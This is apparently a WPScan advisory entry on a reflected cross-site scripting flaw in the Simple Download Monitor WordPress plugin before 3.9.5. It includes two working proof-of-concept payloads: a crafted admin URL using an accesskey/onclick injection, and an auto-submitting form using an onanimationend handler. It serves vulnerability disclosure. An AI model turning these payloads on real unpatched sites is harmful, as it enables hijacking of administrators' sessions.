WordPress Plugin Vulnerabilities
Simple Download Monitor < 3.9.5 - Reflected Cross-Site Scripting
Description
The plugin does not escape the 1) sdm_active_tab GET parameter and 2) sdm_stats_start_date/sdm_stats_end_date POST parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
Proof of Concept
PoC 1: This requires Firefox due to onclick+accesskey trick on hidden input. There is another injection point, but magic quotes are doing its job (it's inside badly-enqueued inline JS) 1) Go to https://example.com/wp-admin/edit.php?post_type=sdm_downloads&page=sdm-stats&sdm_active_tab=browserList%22+accesskey%3DA+onclick%3Dalert%28origin%29%2F%2F 2) Press Alt-Shift-A (Windows) or Cmd-Alt-A (macOS) PoC 2: This does not have browser requirement. <form action="https://example.com/wp-admin/edit.php?post_type=sdm_downloads&page=sdm-stats&sdm_active_tab=browserList" method="post" id="xss"> <input type="hidden" name="sdm_stats_start_date" value="" style=animation-name:rotation onanimationend=alert(origin)//"> </form> <script>xss.submit()</script>
Affects Plugins
Fixed in 3.9.5 References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-05 (about 2 years ago)
Added
2021-10-05 (about 2 years ago)
Last Updated
2022-04-15 (about 2 years ago)
WPScan 